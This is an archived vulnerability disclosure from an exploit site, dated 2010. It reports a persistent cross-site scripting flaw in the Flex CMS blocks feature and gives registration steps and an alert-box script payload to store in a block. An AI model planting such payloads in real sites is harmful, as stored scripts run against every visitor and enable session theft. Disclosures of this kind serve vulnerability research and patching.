Home / os / win7

Flex CMS Persistent XSS Vulnerability

Posted on 21 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Flex CMS Persistent XSS Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=====================================
Flex CMS Persistent XSS Vulnerability
=====================================


AUTHOR : Cur53D
MAIL : Hyq6xx[at]gmail.com
DATE : 20,August,2010
Blog : www.Cur53D.dlstreet.net
Type : XSS
Greetz : Sid3^effects,D34D F0X TH3 BL4CKH4T,*L0rd CrusAd3r*,D4rk357,Sonic,Nishi,r4z0r

####################################################################################
About the Script:

FlexCMS is a user-friendly website content management system.? With FlexCMS you can easily build dynamic

websites within a matter of minutes with just the click of your mouse!? Maintain your web content,

navigation and even limit what groups or specific users can access, from anywhere in the world with just

a web browser!? With an emphasis on security and functionality, FlexCMS is a professional and robust

system suitable for any business or organization website.? Built on the PHP programming language and the

MySQL database, FlexCMS delivers superb performance on any size website.

Vendor:http://www.flexcms.com/

Demo? :http://www.flexcms3.com/
####################################################################################
XSS Vulnerability effects the Blocks Option

Go to the site,Registe and

Go to Edit Block Feature and insert this script and save it

&quot;&gt;&lt;script&gt;alert(&quot;inj3ct0r&quot;)&lt;/script&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-21]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :